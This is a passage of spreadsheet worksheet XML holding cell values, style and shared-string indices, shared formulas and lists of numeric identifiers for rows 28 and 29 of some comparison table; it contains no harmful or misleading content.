      <c r="ES28" s="110">
        <f t="shared" si="28"/>
        <v>1.1</v>
      </c>
      <c r="ET28" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU28" s="110">
        <f t="shared" si="30"/>
        <v>1.004901961</v>
      </c>
      <c r="EV28" s="110">
        <f t="shared" si="31"/>
        <v>1.004901961</v>
      </c>
      <c r="EW28" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX28" s="110">
        <f t="shared" si="33"/>
        <v>1.004901961</v>
      </c>
      <c r="EY28" s="110">
        <f t="shared" si="34"/>
        <v>1.004901961</v>
      </c>
      <c r="EZ28" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA28" s="110">
        <f t="shared" si="79"/>
        <v>1</v>
      </c>
      <c r="FB28" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC28" s="111" t="s">
        <v>691</v>
      </c>
      <c r="FD28" s="111">
        <v>6.0</v>
      </c>
      <c r="FE28" s="111">
        <v>218.0</v>
      </c>
      <c r="FF28" s="101" t="s">
        <v>692</v>
      </c>
      <c r="FG28" s="111" t="s">
        <v>693</v>
      </c>
      <c r="FH28" s="111">
        <v>3.0</v>
      </c>
      <c r="FI28" s="111">
        <v>207.0</v>
      </c>
      <c r="FJ28" s="111" t="s">
        <v>694</v>
      </c>
      <c r="FK28" s="111" t="s">
        <v>692</v>
      </c>
      <c r="FL28" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002752, 2002749, 2100527, 2013514, 13249</v>
      </c>
      <c r="FM28" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN28" s="111" t="s">
        <v>695</v>
      </c>
      <c r="FO28" s="111" t="s">
        <v>696</v>
      </c>
      <c r="FP28" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ28" s="111">
        <v>2.0</v>
      </c>
      <c r="FR28" s="111">
        <v>206.0</v>
      </c>
      <c r="FS28" s="112">
        <v>199.0</v>
      </c>
      <c r="FT28" s="112">
        <v>13.0</v>
      </c>
      <c r="FU28" s="112">
        <v>208.0</v>
      </c>
      <c r="FV28" s="112">
        <v>205.0</v>
      </c>
      <c r="FW28" s="112">
        <v>13.0</v>
      </c>
      <c r="FX28" s="112">
        <v>218.0</v>
      </c>
      <c r="FY28" s="112">
        <v>10.0</v>
      </c>
      <c r="FZ28" s="112">
        <v>0.0</v>
      </c>
      <c r="GA28" s="112">
        <v>204.0</v>
      </c>
      <c r="GB28" s="112">
        <v>204.0</v>
      </c>
      <c r="GC28" s="112">
        <v>11.0</v>
      </c>
      <c r="GD28" s="112">
        <v>205.0</v>
      </c>
      <c r="GE28" s="112">
        <v>208.0</v>
      </c>
      <c r="GF28" s="112">
        <v>2.0</v>
      </c>
      <c r="GG28" s="112">
        <v>210.0</v>
      </c>
      <c r="GH28" s="113">
        <f t="shared" si="39"/>
        <v>1.3</v>
      </c>
      <c r="GI28" s="113">
        <f t="shared" si="40"/>
        <v>1.1</v>
      </c>
      <c r="GJ28" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK28" s="113">
        <f t="shared" si="42"/>
        <v>1.019607843</v>
      </c>
      <c r="GL28" s="113">
        <f t="shared" si="43"/>
        <v>1.004901961</v>
      </c>
      <c r="GM28" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN28" s="113">
        <f t="shared" si="45"/>
        <v>1.068627451</v>
      </c>
      <c r="GO28" s="113">
        <f t="shared" si="46"/>
        <v>1.029411765</v>
      </c>
      <c r="GP28" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ28" s="114">
        <f t="shared" si="81"/>
        <v>1</v>
      </c>
      <c r="GR28" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS28" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT28" s="94"/>
      <c r="GU28" s="116">
        <v>48370.0</v>
      </c>
      <c r="GV28" s="116">
        <v>1.0</v>
      </c>
      <c r="GW28" s="116">
        <v>204.0</v>
      </c>
      <c r="GX28" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY28" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ28" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA28" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB28" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC28" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD28" s="131">
        <v>48370.0</v>
      </c>
      <c r="HE28" s="131">
        <v>48370.0</v>
      </c>
      <c r="HF28" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG28" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH28" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI28" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ28" s="93" t="s">
        <v>697</v>
      </c>
      <c r="HK28" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL28" s="93">
        <v>198.0</v>
      </c>
      <c r="HM28" s="93">
        <f t="shared" si="83"/>
        <v>10</v>
      </c>
      <c r="HN28" s="93">
        <v>10.0</v>
      </c>
      <c r="HO28" s="93">
        <v>0.0</v>
      </c>
      <c r="HP28" s="93">
        <v>10.0</v>
      </c>
      <c r="HQ28" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR28" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS28" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT28" s="139" t="s">
        <v>698</v>
      </c>
      <c r="HU28" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV28" s="119">
        <v>18870.0</v>
      </c>
      <c r="HW28" s="119">
        <v>1.0</v>
      </c>
      <c r="HX28" s="119">
        <v>1.0</v>
      </c>
      <c r="HY28" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ28" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA28" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB28" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC28" s="120">
        <f t="shared" si="87"/>
        <v>18870</v>
      </c>
      <c r="ID28" s="120">
        <v>18870.0</v>
      </c>
      <c r="IE28" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF28" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG28" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH28" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II28" s="99" t="s">
        <v>699</v>
      </c>
      <c r="IJ28" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK28" s="99">
        <v>197.0</v>
      </c>
      <c r="IL28" s="99">
        <v>1.0</v>
      </c>
      <c r="IM28" s="121">
        <f t="shared" si="57"/>
        <v>10</v>
      </c>
      <c r="IN28" s="122" t="s">
        <v>700</v>
      </c>
      <c r="IO28" s="98">
        <v>10.0</v>
      </c>
      <c r="IP28" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ28" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR28" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS28" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT28" s="127"/>
      <c r="IU28" s="127"/>
      <c r="IV28" s="127"/>
      <c r="IW28" s="127"/>
      <c r="IX28" s="127"/>
      <c r="IY28" s="127"/>
      <c r="IZ28" s="127"/>
      <c r="JA28" s="127"/>
      <c r="JB28" s="127"/>
      <c r="JC28" s="127"/>
      <c r="JD28" s="127"/>
      <c r="JE28" s="127"/>
      <c r="JF28" s="127"/>
      <c r="JG28" s="127"/>
      <c r="JH28" s="127"/>
      <c r="JI28" s="127"/>
      <c r="JJ28" s="127"/>
      <c r="JK28" s="127"/>
      <c r="JL28" s="127"/>
      <c r="JM28" s="127"/>
      <c r="JN28" s="127"/>
      <c r="JO28" s="127"/>
      <c r="JP28" s="127"/>
      <c r="JQ28" s="127"/>
      <c r="JR28" s="127"/>
      <c r="JS28" s="127"/>
      <c r="JT28" s="127"/>
      <c r="JU28" s="127"/>
      <c r="JV28" s="127"/>
      <c r="JW28" s="127"/>
      <c r="JX28" s="127"/>
      <c r="JY28" s="127"/>
      <c r="JZ28" s="127"/>
      <c r="KA28" s="127"/>
      <c r="KB28" s="127"/>
      <c r="KC28" s="127"/>
      <c r="KD28" s="127"/>
      <c r="KE28" s="127"/>
      <c r="KF28" s="127"/>
      <c r="KG28" s="127"/>
      <c r="KH28" s="127"/>
      <c r="KI28" s="127"/>
      <c r="KJ28" s="127"/>
      <c r="KK28" s="127"/>
      <c r="KL28" s="127"/>
      <c r="KM28" s="127"/>
      <c r="KN28" s="127"/>
      <c r="KO28" s="127"/>
      <c r="KP28" s="127"/>
      <c r="KQ28" s="127"/>
      <c r="KR28" s="127"/>
      <c r="KS28" s="127"/>
      <c r="KT28" s="127"/>
      <c r="KU28" s="127"/>
      <c r="KV28" s="127"/>
      <c r="KW28" s="127"/>
      <c r="KX28" s="127"/>
      <c r="KY28" s="127"/>
      <c r="KZ28" s="127"/>
      <c r="LA28" s="127"/>
      <c r="LB28" s="127"/>
      <c r="LC28" s="127"/>
      <c r="LD28" s="127"/>
      <c r="LE28" s="127"/>
      <c r="LF28" s="127"/>
      <c r="LG28" s="127"/>
      <c r="LH28" s="127"/>
      <c r="LI28" s="127"/>
      <c r="LJ28" s="127"/>
      <c r="LK28" s="127"/>
      <c r="LL28" s="127"/>
      <c r="LM28" s="127"/>
      <c r="LN28" s="127"/>
      <c r="LO28" s="127"/>
      <c r="LP28" s="127"/>
      <c r="LQ28" s="127"/>
      <c r="LR28" s="127"/>
      <c r="LS28" s="127"/>
      <c r="LT28" s="127"/>
      <c r="LU28" s="127"/>
      <c r="LV28" s="127"/>
      <c r="LW28" s="127"/>
      <c r="LX28" s="127"/>
      <c r="LY28" s="127"/>
      <c r="LZ28" s="127"/>
      <c r="MA28" s="127"/>
      <c r="MB28" s="127"/>
      <c r="MC28" s="127"/>
      <c r="MD28" s="127"/>
      <c r="ME28" s="127"/>
      <c r="MF28" s="127"/>
      <c r="MG28" s="127"/>
      <c r="MH28" s="127"/>
      <c r="MI28" s="127"/>
      <c r="MJ28" s="127"/>
      <c r="MK28" s="127"/>
      <c r="ML28" s="127"/>
      <c r="MM28" s="127"/>
      <c r="MN28" s="127"/>
      <c r="MO28" s="127"/>
      <c r="MP28" s="127"/>
      <c r="MQ28" s="127"/>
      <c r="MR28" s="127"/>
      <c r="MS28" s="127"/>
      <c r="MT28" s="127"/>
      <c r="MU28" s="127"/>
      <c r="MV28" s="127"/>
      <c r="MW28" s="127"/>
      <c r="MX28" s="127"/>
      <c r="MY28" s="127"/>
      <c r="MZ28" s="127"/>
      <c r="NA28" s="127"/>
      <c r="NB28" s="127"/>
      <c r="NC28" s="127"/>
      <c r="ND28" s="127"/>
      <c r="NE28" s="127"/>
      <c r="NF28" s="127"/>
      <c r="NG28" s="127"/>
      <c r="NH28" s="127"/>
      <c r="NI28" s="127"/>
      <c r="NJ28" s="127"/>
      <c r="NK28" s="127"/>
      <c r="NL28" s="127"/>
      <c r="NM28" s="127"/>
      <c r="NN28" s="127"/>
      <c r="NO28" s="127"/>
      <c r="NP28" s="127"/>
      <c r="NQ28" s="127"/>
      <c r="NR28" s="127"/>
      <c r="NS28" s="127"/>
      <c r="NT28" s="127"/>
      <c r="NU28" s="127"/>
      <c r="NV28" s="127"/>
      <c r="NW28" s="127"/>
      <c r="NX28" s="127"/>
      <c r="NY28" s="127"/>
    </row>
    <row r="29" ht="153.75" customHeight="1">
      <c r="B29" s="89" t="s">
        <v>310</v>
      </c>
      <c r="C29" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D29" s="90" t="s">
        <v>311</v>
      </c>
      <c r="E29" s="90" t="s">
        <v>701</v>
      </c>
      <c r="F29" s="90" t="s">
        <v>702</v>
      </c>
      <c r="G29" s="91" t="s">
        <v>703</v>
      </c>
      <c r="H29" s="90" t="s">
        <v>704</v>
      </c>
      <c r="I29" s="92" t="s">
        <v>705</v>
      </c>
      <c r="J29" s="92" t="s">
        <v>706</v>
      </c>
      <c r="K29" s="92" t="s">
        <v>707</v>
      </c>
      <c r="L29" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M29" s="93">
        <v>2.0</v>
      </c>
      <c r="N29" s="93">
        <v>1.0</v>
      </c>
      <c r="O29" s="93">
        <v>1.0</v>
      </c>
      <c r="P29" s="93">
        <v>2.0</v>
      </c>
      <c r="Q29" s="93">
        <f t="shared" si="70"/>
        <v>3</v>
      </c>
      <c r="R29" s="93">
        <v>2.0</v>
      </c>
      <c r="S29" s="93">
        <v>1.0</v>
      </c>
      <c r="T29" s="94" t="s">
        <v>643</v>
      </c>
      <c r="U29" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V29" s="126" t="s">
        <v>708</v>
      </c>
      <c r="W29" s="126" t="s">
        <v>709</v>
      </c>
      <c r="X29" s="132" t="s">
        <v>710</v>
      </c>
      <c r="Y29" s="126" t="s">
        <v>711</v>
      </c>
      <c r="Z29" s="132" t="s">
        <v>712</v>
      </c>
      <c r="AA29" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB29" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC29" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AD29" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE29" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF29" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG29" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH29" s="99" t="s">
        <v>713</v>
      </c>
      <c r="AI29" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ29" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK29" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL29" s="100">
        <v>0.0</v>
      </c>
      <c r="AM29" s="100">
        <v>0.0</v>
      </c>
      <c r="AN29" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO29" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP29" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ29" s="100">
        <v>0.0</v>
      </c>
      <c r="AR29" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS29" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT29" s="100" t="str">
        <f t="shared" si="86"/>
        <v>-</v>
      </c>
      <c r="AU29" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV29" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW29" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX29" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY29" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ29" s="100">
        <v>0.0</v>
      </c>
      <c r="BA29" s="102">
        <v>2.0</v>
      </c>
      <c r="BB29" s="102">
        <v>0.0</v>
      </c>
      <c r="BC29" s="102">
        <v>0.0</v>
      </c>
      <c r="BD29" s="102">
        <v>0.0</v>
      </c>
      <c r="BE29" s="102">
        <v>0.0</v>
      </c>
      <c r="BF29" s="102">
        <v>0.0</v>
      </c>
      <c r="BG29" s="102">
        <v>0.0</v>
      </c>
      <c r="BH29" s="102">
        <v>0.0</v>
      </c>
      <c r="BI29" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ29" s="102">
        <v>0.0</v>
      </c>
      <c r="BK29" s="102">
        <v>0.0</v>
      </c>
      <c r="BL29" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM29" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN29" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO29" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP29" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ29" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR29" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS29" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT29" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU29" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV29" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW29" s="104" t="s">
        <v>714</v>
      </c>
      <c r="BX29" s="104">
        <v>4.0</v>
      </c>
      <c r="BY29" s="104">
        <v>11.0</v>
      </c>
      <c r="BZ29" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA29" s="104" t="s">
        <v>714</v>
      </c>
      <c r="CB29" s="104">
        <v>4.0</v>
      </c>
      <c r="CC29" s="104">
        <v>11.0</v>
      </c>
      <c r="CD29" s="104" t="s">
        <v>715</v>
      </c>
      <c r="CE29" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF29" s="104" t="str">
        <f t="shared" si="73"/>
        <v>2018959, 2016538, 2014520</v>
      </c>
      <c r="CG29" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH29" s="104" t="s">
        <v>715</v>
      </c>
      <c r="CI29" s="104">
        <v>2043217.0</v>
      </c>
      <c r="CJ29" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK29" s="104">
        <v>1.0</v>
      </c>
      <c r="CL29" s="104">
        <v>7.0</v>
      </c>
      <c r="CM29" s="105">
        <v>2.0</v>
      </c>
      <c r="CN29" s="105">
        <v>2.0</v>
      </c>
      <c r="CO29" s="105">
        <v>9.0</v>
      </c>
      <c r="CP29" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ29" s="105">
        <v>11.0</v>
      </c>
      <c r="CR29" s="105">
        <v>11.0</v>
      </c>
      <c r="CS29" s="105">
        <v>0.0</v>
      </c>
      <c r="CT29" s="105">
        <v>0.0</v>
      </c>
      <c r="CU29" s="105">
        <v>0.0</v>
      </c>
      <c r="CV29" s="105">
        <v>0.0</v>
      </c>
      <c r="CW29" s="105">
        <v>2.0</v>
      </c>
      <c r="CX29" s="105">
        <v>9.0</v>
      </c>
      <c r="CY29" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ29" s="105">
        <v>11.0</v>
      </c>
      <c r="DA29" s="105">
        <v>11.0</v>
      </c>
      <c r="DB29" s="106">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="DC29" s="106">
        <f t="shared" si="16"/>
        <v>2</v>
      </c>
      <c r="DD29" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE29" s="106">
        <f t="shared" si="18"/>
        <v>4.5</v>
      </c>
      <c r="DF29" s="106">
        <f t="shared" si="19"/>
        <v>4.5</v>
      </c>
      <c r="DG29" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH29" s="106">
        <f t="shared" si="21"/>
        <v>5.5</v>
      </c>
      <c r="DI29" s="106">
        <f t="shared" si="22"/>
        <v>5.5</v>
      </c>
      <c r="DJ29" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK29" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL29" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM29" s="108" t="s">
        <v>716</v>
      </c>
      <c r="DN29" s="108">
        <v>5.0</v>
      </c>
      <c r="DO29" s="108">
        <v>18.0</v>
      </c>
      <c r="DP29" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ29" s="108" t="s">
        <v>716</v>
      </c>
      <c r="DR29" s="108">
        <v>5.0</v>
      </c>
      <c r="DS29" s="108">
        <v>7.0</v>
      </c>
      <c r="DT29" s="108" t="s">
        <v>717</v>
      </c>
      <c r="DU29" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV29" s="108" t="str">
        <f t="shared" si="85"/>
        <v>2018959, 2016538, 2014520, 50447</v>
      </c>
      <c r="DW29" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX29" s="108" t="str">
        <f>IF(DV29="-",DW29,DV29)</f>
        <v>2018959, 2016538, 2014520, 50447</v>
      </c>
      <c r="DY29" s="108">
        <v>2043217.0</v>
      </c>
      <c r="DZ29" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA29" s="108">
        <v>1.0</v>
      </c>
      <c r="EB29" s="108">
        <v>7.0</v>
      </c>
      <c r="EC29" s="109">
        <v>2.0</v>
      </c>
      <c r="ED29" s="109">
        <v>2.0</v>
      </c>
      <c r="EE29" s="109">
        <v>10.0</v>
      </c>
      <c r="EF29" s="109">
        <v>7.0</v>
      </c>
      <c r="EG29" s="109">
        <v>11.0</v>
      </c>
      <c r="EH29" s="109">
        <v>18.0</v>
      </c>
      <c r="EI29" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ29" s="109">
        <v>0.0</v>
      </c>
      <c r="EK29" s="109">
        <v>0.0</v>
      </c>
      <c r="EL29" s="109">
        <v>0.0</v>
      </c>
      <c r="EM29" s="109">
        <v>2.0</v>
      </c>
      <c r="EN29" s="109">
        <v>10.0</v>
      </c>
      <c r="EO29" s="109">
        <v>7.0</v>
      </c>
      <c r="EP29" s="109">
        <v>11.0</v>
      </c>
      <c r="EQ29" s="109">
        <v>18.0</v>
      </c>
      <c r="ER29" s="110">
        <f t="shared" si="27"/>
        <v>2</v>
      </c>
      <c r="ES29" s="110">
        <f t="shared" si="28"/>
        <v>2</v>
      </c>
      <c r="ET29" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU29" s="110">
        <f t="shared" si="30"/>
        <v>5</v>
      </c>
      <c r="EV29" s="110">
        <f t="shared" si="31"/>
        <v>5</v>
      </c>
      <c r="EW29" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX29" s="110">
        <f t="shared" si="33"/>
        <v>9</v>
      </c>
      <c r="EY29" s="110">
        <f t="shared" si="34"/>
        <v>9</v>
      </c>
      <c r="EZ29" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA29" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB29" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC29" s="111" t="s">
        <v>718</v>
      </c>
      <c r="FD29" s="111">
        <v>12.0</v>
      </c>
      <c r="FE29" s="111">
        <v>36.0</v>
      </c>
      <c r="FF29" s="101" t="s">
        <v>655</v>
      </c>
      <c r="FG29" s="111" t="s">
        <v>719</v>
      </c>
      <c r="FH29" s="111">
        <v>9.0</v>
      </c>
      <c r="FI29" s="111">
        <v>30.0</v>
      </c>
      <c r="FJ29" s="111" t="s">
        <v>720</v>
      </c>
      <c r="FK29" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FL29" s="111" t="str">
        <f t="shared" si="69"/>
        <v>50447, 2002752, 2002749, 2006408, 2018959, 2016538, 2014520, 2011803, 2101200, 2101390, 2006409</v>
      </c>
      <c r="FM29" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN29" s="111" t="s">
        <v>720</v>
      </c>
      <c r="FO29" s="111">
        <v>2043217.0</v>
      </c>
      <c r="FP29" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ29" s="111">
        <v>1.0</v>
      </c>
      <c r="FR29" s="111">
        <v>14.0</v>
      </c>
      <c r="FS29" s="112">
        <v>2.0</v>
      </c>
      <c r="FT29" s="112">
        <v>2.0</v>
      </c>
      <c r="FU29" s="112">
        <v>25.0</v>
      </c>
      <c r="FV29" s="112">
        <v>7.0</v>
      </c>
      <c r="FW29" s="112">
        <v>29.0</v>
      </c>
      <c r="FX29" s="112">
        <v>36.0</v>
      </c>
      <c r="FY29" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ29" s="112">
        <v>0.0</v>
      </c>
      <c r="GA29" s="112">
        <v>0.0</v>
      </c>
      <c r="GB29" s="112">
        <v>0.0</v>
      </c>
      <c r="GC29" s="112">
        <v>2.0</v>
      </c>
      <c r="GD29" s="112">
        <v>21.0</v>
      </c>
      <c r="GE29" s="112">
        <v>7.0</v>
      </c>
      <c r="GF29" s="112">
        <v>23.0</v>
      </c>
      <c r="GG29" s="112">
        <v>30.0</v>
      </c>
      <c r="GH29" s="113">
        <f t="shared" si="39"/>
        <v>2</v>
      </c>
      <c r="GI29" s="113">
        <f t="shared" si="40"/>
        <v>2</v>
      </c>
      <c r="GJ29" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK29" s="113">
        <f t="shared" si="42"/>
        <v>12.5</v>
      </c>
      <c r="GL29" s="113">
        <f t="shared" si="43"/>
        <v>10.5</v>
      </c>
      <c r="GM29" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN29" s="113">
        <f t="shared" si="45"/>
        <v>18</v>
      </c>
      <c r="GO29" s="113">
        <f t="shared" si="46"/>
        <v>15</v>
      </c>
      <c r="GP29" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ29" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR29" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS29" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT29" s="94" t="s">
        <v>721</v>
      </c>
      <c r="GU29" s="147">
        <v>52676.0</v>
      </c>
      <c r="GV29" s="116">
        <v>1.0</v>
      </c>
      <c r="GW29" s="116">
        <v>4.0</v>
      </c>
      <c r="GX29" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY29" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ29" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA29" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB29" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC29" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD29" s="131">
        <v>52676.0</v>
      </c>
      <c r="HE29" s="131">
        <v>52676.0</v>
      </c>
      <c r="HF29" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG29" s="117"/>
      <c r="HH29" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI29" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ29" s="93" t="s">
        <v>722</v>
      </c>
      <c r="HK29" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL29" s="93">
        <v>2.0</v>
      </c>
      <c r="HM29" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN29" s="93">
        <v>0.0</v>
      </c>
      <c r="HO29" s="93">
        <v>0.0</v>
      </c>
      <c r="HP29" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ29" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR29" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS29" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT29" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU29" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV29" s="145" t="s">
        <v>662</v>
      </c>
      <c r="HW29" s="119">
        <v>2.0</v>
      </c>
      <c r="HX29" s="119">
        <v>11.0</v>
      </c>
      <c r="HY29" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ29" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA29" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB29" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC29" s="120">
        <v>86782.0</v>
      </c>
      <c r="ID29" s="120" t="s">
        <v>662</v>
      </c>
      <c r="IE29" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF29" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG29" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH29" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II29" s="99" t="s">
        <v>723</v>
      </c>
      <c r="IJ29" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK29" s="99">
        <v>2.0</v>
      </c>
      <c r="IL29" s="99">
        <v>0.0</v>
      </c>
      <c r="IM29" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN29" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO29" s="98">
        <v>2.0</v>
      </c>
      <c r="IP29" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ29" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR29" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS29" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT29" s="127"/>
      <c r="IU29" s="127"/>
      <c r="IV29" s="127"/>
      <c r="IW29" s="127"/>
      <c r="IX29" s="127"/>
      <c r="IY29" s="127"/>
      <c r="IZ29" s="127"/>
      <c r="JA29" s="127"/>
      <c r="JB29" s="127"/>
      <c r="JC29" s="127"/>
      <c r="JD29" s="127"/>
      <c r="JE29" s="127"/>
      <c r="JF29" s="127"/>
      <c r="JG29" s="127"/>
      <c r="JH29" s="127"/>
      <c r="JI29" s="127"/>
      <c r="JJ29" s="127"/>
      <c r="JK29" s="127"/>
      <c r="JL29" s="127"/>
      <c r="JM29" s="127"/>
      <c r="JN29" s="127"/>
      <c r="JO29" s="127"/>
